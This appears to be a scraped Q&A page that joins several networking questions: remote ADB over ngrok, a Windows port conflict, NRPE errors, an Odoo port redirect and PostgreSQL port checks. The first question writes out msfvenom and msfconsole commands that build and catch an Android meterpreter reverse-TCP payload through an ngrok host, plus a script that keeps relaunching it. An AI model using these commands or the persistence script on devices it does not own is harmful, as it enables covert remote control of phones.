I have an Android device at home that I use to develop on, and I'm connecting to it through my laptop with adb and scrcpy.
However, if I'm not home adb doesn't see the device. I made an apk for the device with msfvenom for reverse tcp like this:
msfvenom -p android/meterpreter/reverse_tcp LHOST=x.tcp.ngrok.io LPORT=(ngrok port) R > /home/user/reversetcp.apk
then I set up the reverse tcp handler in msfconsole:
msf6 > use exploit/multi/handler msf6 exploit(multi/handler) > set payload android/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 127.0.0.1
msf6 exploit(multi/handler) > exploit
After this I install and run the apk on my device, then meterpreter opens the session;
[*] Meterpreter session 1 opened (127.0.0.1:25565 -> 127.0.0.1:40146) at 2023-01-07 21:39:43 +0100
and the ngrok console shows up 1 connection (my device). But if I try to add the ngrok server to adb like this:
adb connect "ngrok address"
(there I tried the ngrok tcp link, and 127.0.0.1 with both ports, none of them works) I get the following error: failed to connect to '127.0.0.1:25565': Connection refused I could make a vpn on my local network, but the power usually goes down, so the vpn is a dead end. what am I doing wrong? or adb can't connect with ngrok?
My second issue is, that meterpreter randomly closes the session after around 8 minutes, and if the device powers off and on or if the power goes out the device switches from wifi to mobile data, and I can't reconnect. How can I make the apk run on startup and reconnect if there is a change in the internet connection?
Update: I made an shell script to reopen the reverse tcp apk after 10 mins or if there is internet connection, but it would be better if the connection wouldn't close, and the device isn't rooted, so I can't add the script to the folder to run on startup. Another way to keep the reverse tcp connection would be better, to open an reverse tcp (and keep it open), and if there is change in the internet connection then reconnect automatically.
Btw, here is the script that i wrote:
#!/bin/sh
# check for internet connection
while ! ping -c 1 google.com &> /dev/null
do
# wait 20 seconds before trying again
sleep 20
done
# run the activity
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
# run the activity every 10 minutes
while true
do
sleep 600
am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
done
I am convinced that it is not possible to connect a device using reverse meterpreter shell because ADB requires a raw TCP connection rather than meterpreter shell.
You can use the ZeroTier application to create a private network for your devices that can be accessible via the internet. It functions similarly to VPN, but traffic is routed directly rather than through a centralized VPN server.
This post describes how to connect adb using TCPIP in detail.
Related
I have a React app made using create-react-app. I've been running this app without any issues for a few months now but have recently ran into an issue with starting the app because it says the port is in use. Here is the error message: Something is already running on port 3000. I'm trying to run the app on a Windows 10 machine.
Everything I've tried so far is listed below:
Running netstat -an and checking the output. This shows nothing running on port 3000.
Running netstat -an | findstr "3000". This shows no output.
Running npx kill-port 3000. I still get the port in use error message after running this.
Changing port that the app is running on. It doesn't matter which port I choose, it always says the port is in use.
Checking the Listening Ports list in Resource Monitor shows nothing listening on port 3000
Restarting my PC
The only thing that works is running the app in a Ubuntu 20.04 VM... which seems to indicate there's something listening on port 3000 on my Windows machine. However, I'm not sure what else I can do to troubleshoot this issue. I'm looking for suggestions on what else I could try.
Edit
Here's the contents of my hosts file C:\Windows\System32\drivers\etc\hosts:
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
# Added by Docker Desktop
192.168.2.115 host.docker.internal
192.168.2.115 gateway.docker.internal
# To allow the same kube context to work on the host and the container:
127.0.0.1 kubernetes.docker.internal
# End of section
You can change it like below and try again, I'm not sure try once:
FYI, C:\Windows\System32\drivers\etc\hosts
Change to,
# localhost name resolution is handled within DNS itself.
127.0.0.1 localhost
::1 localhost
Instead of below this:
127.0.0.1 kubernetes.docker.internal
I resolved the issue by restarting the WinNAT service. I found the solution in the answers here: Error: listen EACCES: permission denied 0.0.0.0:3001
These are the steps:
Start Command Prompt or PowerShell as Administrator
Stop WinNAT with this command: net stop winnat
Start WinNAT again with this command: net start winnat
I'm trying to excute the following command:
/usr/lib/nagios/plugings/check_nrpe -H xxxxxxx -c check_disk -a 60 80 /dev/sda1
but I got the following message:
CHECK_NRPE: Received 0 bytes from daemon. Check the remote server logs for error messages.
When I consult the log in the remote host, I found that:
anonymous rsyslogd-2359: action 'action 17' resumed (module 'builtin:ompipe') [try http://www.rsyslog.com/e/2359 ]
The command /usr/lib/nagios/plugings/check_disk -a 60 80 /dev/sda1 is working fine in the remote host.
A couple of things to check:
On the machine where you have NRPE installed, check the nrpe.cfg file. Make sure the allowed_hosts= line is uncommented and that its value includes the IP address of the Nagios server that's trying to connect to it. Make sure the dont_blame_nrpe line is uncommented and it's value is set to 1, i.e.: dont_blame_nrpe=1.
Restart nrpe.
If you have firewall rules enabled on this machine, make sure there's a rule to allow connections to tcp port 5666.
The first thing i did in my odoo was created two databases, later i want to remove the port ip:8069 from the url so i do:
Go to terminal open rc.local file. rc.local file reside in etc folder.
sudo gedit /etc/rc.local
Paste this command on rc.local file and save
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8069
Reboot Ubuntu, to see effect
sudo reboot
the result is that i can acces without put the port in the URL, but it send me to the page to create a database, not to the selection.
I think i must configure something in the databases created but i don't know what.
Can anyone help me?
thanks for any help you can offer.
To change the port of an Openerp server, you have to make the change in config.py file. Which is located at
your-openerp-server/openerp/tools/config.py
and change the port in the below my_default attribute
group.add_option("--xmlrpc-port", dest="xmlrpc_port", my_default=8069,
help="specify the TCP port for the XML-RPC protocol", type="int")
and restart the server.
Given an IP Address and port number, is it possible to check if the machine with that IP address has Postgresql listening on the specified port? If so, how?
I just want to obtain a boolean value of whether Postgresql is listening on the specified port of the specified machine.
You can use, for example, nmap tool:
=$ sudo nmap -v -p 5930 127.0.0.1
Starting Nmap 6.00 ( http://nmap.org ) at 2013-06-25 19:28 CEST
Initiating SYN Stealth Scan at 19:28
Scanning localhost (127.0.0.1) [1 port]
Discovered open port 5930/tcp on 127.0.0.1
Completed SYN Stealth Scan at 19:28, 0.03s elapsed (1 total ports)
Nmap scan report for localhost (127.0.0.1)
Host is up (0.000045s latency).
PORT STATE SERVICE
5930/tcp open unknown
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds
Raw packets sent: 1 (44B) | Rcvd: 2 (88B)
Alternatively you can just "SELECT 1" with psql, and check output:
=$ psql -h 127.0.0.1 -p 5930 -c "select 1"
?column?
----------
1
(1 row)
=$ psql -h 127.0.0.1 -p 5940 -c "select 1"
psql: could not connect to server: Connection refused
Is the server running on host "127.0.0.1" and accepting
TCP/IP connections on port 5940?
I think you need to define what you're trying to achieve better. Do you just want to know if anything is listening on a certain point? If PostgreSQL is listening on a given port? If PostgreSQL is running and actually accepting connections? If you can connect to PostgreSQL, authenticate successfully and issue queries?
One option is to invoke psql to connect to it and check the result code. Do not attempt to parse the output text, since that's subject to translation into different languages.
Better, use the client library for the language of your choice - psycopg2 for Python, PgJDBC for Java, the Pg gem for Ruby, DBD::Pg for Perl, nPgSQL for C#, etc. This is the approach I'd recommend. The SQLSTATE or exception details from any connection error will tell you more about why the connection failed - you'll be able to tell the difference between the server not listening, authentication failure, etc this way. For example, in Python:
import psycopg2
try:
conn = psycopg2.connect("host=localhost dbname=postgres")
conn.close()
except psycopg2.OperationalError as ex:
print("Connection failed: {0}".format(ex))
There are exception details in ex.pgcode (the SQLSTATE) to tell you more about errors that're generated server-side, like authentication failures; it'll be empty for client-side errors.
If you just want to see if something is listening on a given IP and TCP port, you can use netcat (*nix only), or a simple script in the language of your choice that creates a socket and does a connect() then closes the socket if it gets a successful response. For example, the following trivial Python script:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.connect(('localhost',5432))
s.close()
except socket.error as ex:
print("Connection failed with errno {0}: {1}".format(ex.errno, ex.strerror))
The same approach applies in any programming language, just the details of the socket library and error handling vary.
For some purposes it can also be useful to use the netstat tool to passively list which processes are listening on which network sockets. The built-in netstat on Windows is pretty brain-dead so you have to do more parsing of the output than with netstat for other platforms, but it'll still do the job. The presence of a socket in netstat doesn't mean that connecting to it will succeed, though; if the process has failed in some way that leaves it broken but still running (stuck in an infinite loop, blocked by a debugger, SIGSTOPed, etc) then it won't respond to an actual connection attempt.
In brief
In details
Fastest way is to use netcat aka nc with timeout ability as shared here
Results as 0/1 means postgres working/not-working
echo 'QUIT' | nc -w SECONDS YOUR_HOST PORT; echo $?
# eg
echo 'QUIT' | nc -w 1 localhost 5432; echo $?
Another also-faster way that works for me is to use telnet as discussed here.
echo -e '\x1dclose\x0d' | telnet YOUR_HOST PORT
# eg
echo -e '\x1dclose\x0d' | telnet localhost 5432
How do you test to see if your program is working and able to connect with server? I tried stackoverflow server's ip through port 40 and it fails after a min at connect().
test.exe 64.34.119.12 echo 40
Program arguments take a syntax: <Server IP> <Echo Word> [<Echo Port>]
Also, can you test without having to connect to internet?
You should be able to connect to your own echo server on 127.0.0.1:7 if it is running, or get a 'connection refused' (ECONN) if it isn't running. Either would show that your code is OK actually.
As for testing without having to connect to the internet...
I'd download netcat for windows.
NetCat download
Extract the tool, and run:
nc.exe -v -l -p [port]
If you do that, it opens up a "server" and you can connect to it using your application; just point the IP address to 127.0.0.1!